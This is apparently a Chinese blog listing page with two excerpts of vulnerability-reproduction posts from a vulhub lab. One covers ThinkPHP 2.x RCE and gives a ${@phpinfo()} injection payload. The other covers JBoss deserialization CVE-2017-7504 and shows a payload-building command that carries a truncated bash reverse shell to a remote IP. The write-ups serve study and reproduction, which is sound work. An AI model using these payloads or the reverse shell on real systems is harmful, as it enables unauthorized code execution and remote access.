2021年3月14日
thinkphp 2.x rce 漏洞复现
摘要: 环境搭建 kali中下载vulhub 安装docker 与docker-compose 漏洞影响范围 thinkphp2.x 漏洞复现 payload1 /index.php?s=/index/index/xxx/${@phpinfo()} //出现phpinfo明杆路径 payload2 /ind 阅读全文
posted @ 2021-03-14 20:22 ze_z 阅读(305) 评论(0) 推荐(0) 编辑
jboss反序列化(cve-2017-7504)
摘要: 影响范围 JBoss AS 4.x及之前版本 复现 编译生成序列化数据 序列化恶意数据 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.16 阅读全文
posted @ 2021-03-14 12:24 ze_z 阅读(341) 评论(0) 推荐(0) 编辑